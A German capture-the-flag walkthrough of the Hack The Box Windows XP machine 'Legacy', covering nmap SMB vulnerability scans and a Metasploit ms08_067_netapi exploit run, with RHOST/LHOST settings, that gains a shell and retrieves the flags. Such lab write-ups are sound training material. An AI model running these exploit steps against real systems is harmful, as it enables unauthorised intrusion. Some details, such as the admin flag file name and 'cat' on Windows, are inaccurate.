Legacy ist eine einfache Maschine welche Windows XP als Betriebssystem nutzt. Sie wurde am 15. März 2017 veröffentlicht und fällt in die Kategorie Windows sowie Injection.
Discovery
Nachdem ich meine virtuelle Maschine mit dem Netzwerk von VPN verbunden habe, verschaffe ich mir im ersten Schritt, wie in den meisten Fällen, einen Überblick mit NMAP.
nmap -sV -sC -Pn <ip>
Die Ergebnisse des Scans zeigen uns die Ports 139, 445 für SMB und den Port 3389 für Remote Desktop. Desweiteren kann erkannt werden das es sich um eine Windows XP Maschine handelt, der Name der Maschine scheint Programm zu sein. Im nächsten Schritt nutzen wir die Skripte von NMAP um den SMB Service näher zu untersuchen:
nmap -Pn -script smb-vuln* -p 139,445 <ip>
Es wurden zwei Schwachstellen (CVE-2008-4250 und CVE-2017-0143) gefunden. Da es sich in beiden fällen um ältere sehr kritische Schwachstellen handelt ist die wahrscheinlichkeit das es einen Exploit gibt groß. Nach etwas googeln stellt sich heraus das es sich bei der zweiten Schwachstelle (CVE-2017-0143) um EternalBlue handelt. Eine Schwachstelle die unteranderem von den bekannten Verschlüsselungstrojaner WannaCry verwendet wurde (Wikipedia). Ein Exploit für Metasploit liegt vor.
Exploit
Nachdem wir Metasploit gestartet haben laden wir das Modul ms08_067_netapi, setzen die richtigen Optionen und starten den Exploit:
use exploit/windows/smb/ms08_067_netapi
set target 0
set RHOST <ZIEL>
set LHOST <Eigene_IP>
exploit
Wir haben nun Zugriff auf die Maschine.
Die Flags
Aktuell befinden wir uns im System32 Ordner, um in das Hauptverzeichnis der Festplatte zu kommen verwenden wir folgende Befehle:
cd ..
cd .. 
Die Flags liegen in der Regel auf dem Desktop des Anwenders und des Administrators. Die Ordner der jeweiligen Anwender sind unter Documents and Settings zu finden.
Der normale Anwender wir John sein und wie erwartet finden wir die User Flag unter …/john/Desktop/user.txt und die des Admins unter …/Administrator/Desktop/user.txt. Der Inhalt einer Textdatei kann mit cat datei.txt ausgegeben werden.
